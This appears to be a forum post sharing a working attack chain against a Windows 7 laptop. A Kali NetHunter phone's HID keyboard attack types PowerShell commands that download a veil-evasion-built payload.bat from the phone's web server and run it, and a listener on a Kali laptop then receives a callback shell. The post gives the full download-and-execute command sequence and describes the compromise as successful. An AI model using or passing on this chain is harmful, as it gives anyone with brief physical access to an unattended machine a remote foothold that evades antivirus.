I recently for one reason or another(probably user error) had trouble getting a windows 7 laptop to accept a payload,
having tried various ways and coming up empty handed i ended up creating the payload with veil-evasion and hosting it
in my nexus #/data/local/kali-armhf/var/www folder.

I then used the windows CMD section of HID Keyboard Attack and entered the following, 192.168.0.2 was the ip of my
nexus.

*CD c:/
Powershell
$Url='http://192.168.0.2/payload.bat'
$Path='C:payload.bat'
$Username=''
$Password=''

$WebClient=New-Object System.Net.WebClient
$WebClient.Credentials=New-Object System.Net.Networkcredential($Username, $Password)
$WebClient.DownloadFile( $url, $path )

exit
payload.bat

Then i set up the Listener on my kali laptop, to wait for a call. I selected windows 7 ticked Admin, plugged
in and Pressed Execute. The windows 7 laptop proceeded to download the payload from my nexus and run it.
Kali then recieved a call back straight away. I'm sure this is by far not the best way to do this and could
probably be done a lot easier another way, but for me it suited the situation. And just wanted to share.


Many thanks.